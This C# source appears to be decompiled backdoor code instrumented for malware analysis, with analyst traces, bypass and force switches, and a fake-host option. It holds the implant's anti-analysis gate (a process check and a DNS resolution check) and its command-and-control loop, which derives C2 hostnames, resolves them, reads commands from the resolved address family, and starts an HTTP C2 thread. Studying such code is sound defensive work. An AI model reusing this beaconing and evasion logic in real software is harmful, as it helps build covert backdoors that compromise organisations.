/// <summary>
/// Pre-flight gate: runs up to three rounds of a process check followed by a
/// name-resolution check against <c>Settings.fakehost</c>.
/// </summary>
/// <returns>
/// <c>true</c> as soon as <c>DnsHelper.CheckServerConnection</c> succeeds or <c>bypassw</c> is set;
/// <c>false</c> when <c>ProcessTracker.TrackProcesses(true)</c> returns <c>true</c> or every round fails.
/// </returns>
private static bool UpdateNotification()
{
    // Analyst tracing helper: every message gets a freshly sampled timestamp prefix.
    Action<string> trace = delegate (string message)
    {
        Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - " + message);
    };

    trace("Entered UpdateNotification()");

    int rounds = 3;
    trace("UpdateNotification is done " + rounds + "times");

    // The round number printed is the count of rounds still left (2, 1, 0).
    for (int remaining = rounds - 1; remaining >= 0; remaining--)
    {
        trace("UpdateNotification round" + remaining);
        Utilities.DelayMin(0, 0);

        // A true result from the process check aborts the whole gate.
        bool processCheckTripped = ProcessTracker.TrackProcesses(true);
        if (processCheckTripped)
        {
            trace("Backdoor TrackProcesses() complete and check now returns false");
            return false;
        }

        trace("Backdoor CheckServerConnection() to the Internet (Actually it just checks if it can resolve)");

        // Caveat for isolated labs: the lookup is issued before bypassw is consulted,
        // so the DNS query for Settings.fakehost still happens when the bypass is on.
        bool resolved = DnsHelper.CheckServerConnection(Settings.fakehost);
        if (resolved || bypassw)
        {
            trace("Backdoor CheckServerConnection() passed.");
            return true;
        }
    }

    trace("CheckServerConnection() failed unable to resolve: " + Settings.fakehost + " [Maybe use -a host] or [-w to bypass check]");
    return false;
}
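/// <summary>
/// Resolves <paramref name="hostName"/> and classifies the first IPv4 address of the answer
/// into an <see cref="AddressFamilyEx"/> value, updating <paramref name="rec"/> along the way.
/// </summary>
/// <remarks>
/// The result depends only on what the resolver returns (the address and the host name reported
/// in the <see cref="IPHostEntry"/>), so DNS query/response logging is where this step is
/// observable. The Console.WriteLine calls are analysis tracing.
/// </remarks>
/// <param name="hostName">Name handed to <c>DnsHelper.GetIPHostEntry</c>.</param>
/// <param name="rec">
/// Record to update: <c>cname</c> is cleared on entry and set to the reported host name when it
/// differs from <paramref name="hostName"/>; <c>dnssec</c> is written through the <c>out</c>
/// argument or cleared in the NetBios branch.
/// </param>
/// <returns>
/// <c>Error</c> when resolution yields nothing, an exception occurs, or the answer cannot be
/// classified; <c>Unknown</c> when the answer holds no IPv4 address; otherwise the family chosen
/// by the branches below.
/// </returns>
public static AddressFamilyEx GetAddressFamily(string hostName, DnsRecords rec)
{
    rec.cname = null;
    try
    {
        IPHostEntry iphostEntry = DnsHelper.GetIPHostEntry(hostName);
        if (iphostEntry == null)
        {
            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Unable to get IP addresses for " + hostName);
            return AddressFamilyEx.Error;
        }

        // Only the first IPv4 address decides the outcome; other address families are skipped.
        foreach (IPAddress ipaddress in iphostEntry.AddressList)
        {
            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Ip address resolved for " + hostName + " " + ipaddress);
            if (ipaddress.AddressFamily != AddressFamily.InterNetwork)
            {
                continue;
            }

            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is InterNetwork");

            // Reported host name equals the queried name (or is empty): the address itself
            // is classified and rec is filled from it.
            if (iphostEntry.HostName == hostName || string.IsNullOrEmpty(iphostEntry.HostName))
            {
                IPAddressesHelper.GetAddresses(ipaddress, rec);
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Geting addresses for " + ipaddress + "Rec" + rec);
                return IPAddressesHelper.GetAddressFamily(ipaddress, out rec.dnssec);
            }

            // The resolver reported a different name: remember it for the caller.
            rec.cname = iphostEntry.HostName;
            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Rec.cname is now " + iphostEntry.HostName);

            if (IPAddressesHelper.GetAddressFamily(ipaddress) == AddressFamilyEx.Atm)
            {
                // Fixed trace text: this branch returns Atm, but the message said InterNetwork,
                // which made the trace contradict the value the caller acts on.
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is Atm");
                return AddressFamilyEx.Atm;
            }

            if (rec.dnssec)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - rec.DNSSEC is true");
                rec.dnssec = false;
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Address family is Netbios");
                return AddressFamilyEx.NetBios;
            }

            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Unable to identify address family");
            return AddressFamilyEx.Error;
        }

        return AddressFamilyEx.Unknown;
    }
    catch (Exception ex)
    {
        // Still mapped to Error as before, but no longer silent: without this line the trace
        // cannot tell a classification failure from a resolver or helper exception.
        Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - GetAddressFamily() exception for " + hostName + ": " + ex.GetType().Name + ": " + ex.Message);
    }

    return AddressFamilyEx.Error;
}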
/// <summary>
/// Reports whether <paramref name="hostName"/> resolves to at least one address that
/// <c>IPAddressesHelper.GetAddressFamily</c> classifies as something other than
/// <c>Error</c> or <c>Atm</c>.
/// </summary>
/// <param name="hostName">Name handed to <c>DnsHelper.GetIPHostEntry</c>.</param>
/// <returns>
/// <c>true</c> on the first acceptable address; <c>false</c> when nothing resolves, every
/// address is rejected, or any exception is thrown.
/// </returns>
public static bool CheckServerConnection(string hostName)
{
    try
    {
        IPHostEntry resolved = DnsHelper.GetIPHostEntry(hostName);
        if (resolved == null)
        {
            return false;
        }

        foreach (IPAddress candidate in resolved.AddressList)
        {
            AddressFamilyEx family = IPAddressesHelper.GetAddressFamily(candidate);

            // Which addresses map to Error/Atm is decided by IPAddressesHelper, not shown here.
            bool rejected = family == AddressFamilyEx.Error || family == AddressFamilyEx.Atm;
            if (!rejected)
            {
                return true;
            }
        }
    }
    catch (Exception)
    {
        // Every failure is swallowed and reported as "not connected"; nothing is traced here.
    }

    return false;
}
/// <summary>
/// Main loop: after the UpdateNotification() gate passes, repeatedly derives a host name,
/// resolves it through DnsHelper.GetAddressFamily, and acts on the returned address family.
/// </summary>
/// <remarks>
/// Reading aid for analysts (decompiler names kept as-is):
/// flag  - set to leave the loop; flag2 - written by GetPreviousString(out ...), gates the
/// New -> Append transition; flag3 - picks GetNextStringEx over GetNextString;
/// num - count of consecutive passes with Settings.svcListModified2 set;
/// num2 - attempt counter (1..3), reset by the NetBios branch; a - saved copy of dnsRecords.A.
/// The Console.WriteLine calls and the bypassn / force* switches are analysis instrumentation.
/// Only the NetBios branch creates an HttpHelper; every pass performs one name resolution, so
/// resolver logs show each iteration of this loop.
/// </remarks>
private static void Update()
{
    bool flag = false;
    CryptoHelper cryptoHelper = new CryptoHelper(userId, domain4);
    HttpHelper httpHelper = null;
    Thread thread = null;
    bool flag2 = true;
    AddressFamilyEx addressFamilyEx = AddressFamilyEx.Unknown;
    int num = 0;
    bool flag3 = true;
    DnsRecords dnsRecords = new DnsRecords();
    Random random = new Random();
    int a = 0;
    // Gate: nothing below runs unless the pre-flight check returns true.
    if (!UpdateNotification())
    {
        Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() failed.");
        return;
    }
    Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - UpdateNotification() complete.");
    Settings.svcListModified2 = false;
    int num2 = 1;
    // At most three consecutive attempts; the NetBios branch sets num2 back to 0, so the loop
    // keeps going for as long as resolutions keep classifying as NetBios.
    while (num2 <= 3 && !flag)
    {
        // Delay is taken from the record's A field for both arguments.
        // NOTE(review): units/semantics of DelayMin are not visible here - confirm in Utilities.
        Utilities.DelayMin(dnsRecords.A, dnsRecords.A);
        // A true result from TrackProcesses skips the body and falls to the break below.
        if (!ProcessTracker.TrackProcesses(true))
        {
            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - TrackProcesses() complete.");
            if (Settings.svcListModified1)
            {
                flag3 = true;
            }
            num = (Settings.svcListModified2 ? (num + 1) : 0);
            string hostName;
            if (status == ReportStatus.New)
            {
                // After an Error result the current string is reused; otherwise the previous one
                // is requested and flag2 is overwritten by the helper.
                hostName = ((addressFamilyEx == AddressFamilyEx.Error) ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out flag2));
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
            }
            else
            {
                // Any status other than New or Append ends the loop.
                if (status != ReportStatus.Append)
                {
                    break;
                }
                hostName = (flag3 ? cryptoHelper.GetNextStringEx(dnsRecords.dnssec) : cryptoHelper.GetNextString(dnsRecords.dnssec));
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - hostName var set to: " + hostName);
            }
            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor is pulling the dnsRecords of C2: " + dnsRecords);
            // Instrumentation: replace the generated name with the analyst-supplied host.
            if (bypassn)
            {
                hostName = Settings.fakehost;
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Bypassing original C2 hostname and instead will be using " + hostName);
            }
            addressFamilyEx = DnsHelper.GetAddressFamily(hostName, dnsRecords);
            // NOTE(review): the "-1 .. -8" legend appears to list the harness's force switches,
            // not enum values - confirm against the option parser.
            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - AddressFamily is (-1 Netbios, -2 ImpLink, -3 Atm, -4 Ipx, -5 InterNetwork, -6 InterNetworkV6, -7 Unknown, -8 Error) : " + addressFamilyEx + " [-1-8 to force Family]");
            // Instrumentation: each force* switch overrides the resolved family. They are applied
            // in order, so when several are set the last one wins.
            if (forcea)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Netbios family");
                addressFamilyEx = AddressFamilyEx.NetBios;
                // Also supplies a cname so the HttpHelper path in the NetBios branch is taken.
                dnsRecords.cname = Settings.fakehost;
            }
            if (forceb)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing ImpLink family");
                addressFamilyEx = AddressFamilyEx.ImpLink;
            }
            if (forcec)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Atm family");
                addressFamilyEx = AddressFamilyEx.Atm;
            }
            if (forced)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Ipx family");
                addressFamilyEx = AddressFamilyEx.Ipx;
            }
            if (forcee)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetwork family");
                addressFamilyEx = AddressFamilyEx.InterNetwork;
            }
            if (forcef)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing InterNetworkV6 family");
                addressFamilyEx = AddressFamilyEx.InterNetworkV6;
            }
            if (forceg)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Unknown family");
                addressFamilyEx = AddressFamilyEx.Unknown;
            }
            if (forceh)
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Forcing Error family");
                addressFamilyEx = AddressFamilyEx.Error;
            }
            switch (addressFamilyEx)
            {
                // NetBios: keep going, advance the persisted status, and possibly start HttpHelper.
                case AddressFamilyEx.NetBios:
                    if (status == ReportStatus.Append)
                    {
                        Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is APPEND");
                        flag3 = false;
                        if (dnsRecords.dnssec)
                        {
                            // Save the record's A value and substitute a short random one (1 or 2).
                            a = dnsRecords.A;
                            dnsRecords.A = random.Next(1, 3);
                        }
                    }
                    if (status == ReportStatus.New && flag2)
                    {
                        Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Backdoor status is NEW");
                        // The New -> Append transition is written out through ConfigManager.
                        status = ReportStatus.Append;
                        ConfigManager.WriteReportStatus(status);
                    }
                    if (!string.IsNullOrEmpty(dnsRecords.cname))
                    {
                        Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - HTTPHELPER");
                        // Restore the saved value (0 unless the Append/dnssec path above ran).
                        dnsRecords.A = a;
                        // Tear down any previous helper/thread before creating a new one.
                        HttpHelper.Close(httpHelper, thread);
                        httpHelper = new HttpHelper(userId, dnsRecords);
                        // The helper thread is not started on the first pass after
                        // svcListModified2 was set (num <= 1).
                        if (!Settings.svcListModified2 || num > 1)
                        {
                            Settings.svcListModified2 = false;
                            thread = new Thread(new ThreadStart(httpHelper.Initialize)) { IsBackground = true };
                            thread.Start();
                        }
                    }
                    // Reset the attempt counter (becomes 1 after the increment at IL_1F9).
                    num2 = 0;
                    break;
                // ImpLink / Atm: persist Truncate, call SetAutomaticMode, and leave the loop.
                case AddressFamilyEx.ImpLink:
                case AddressFamilyEx.Atm:
                    ConfigManager.WriteReportStatus(ReportStatus.Truncate);
                    ProcessTracker.SetAutomaticMode();
                    flag = true;
                    break;
                // Ipx: an Append status is written back as New, then the loop ends.
                case AddressFamilyEx.Ipx:
                    if (status == ReportStatus.Append)
                    {
                        ConfigManager.WriteReportStatus(ReportStatus.New);
                    }
                    flag = true;
                    break;
                // Plain address families and Unknown simply end the loop.
                case AddressFamilyEx.InterNetwork:
                case AddressFamilyEx.InterNetworkV6:
                case AddressFamilyEx.Unknown:
                    goto IL_1F7;
                // Error: pick a random value in [420, 540) for the next delay and retry
                // (the attempt counter keeps counting, so at most three in a row).
                case AddressFamilyEx.Error:
                    dnsRecords.A = random.Next(420, 540);
                    Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Random dnsRecord generated.");
                    break;
                default:
                    goto IL_1F7;
            }
            // Decompiler-generated labels: IL_1F9 is the loop increment, IL_1F7 is "exit requested".
            IL_1F9:
            num2++;
            continue;
            IL_1F7:
            flag = true;
            goto IL_1F9;
        }
        break;
    }
    // Always release the helper and its thread on the way out.
    HttpHelper.Close(httpHelper, thread);
}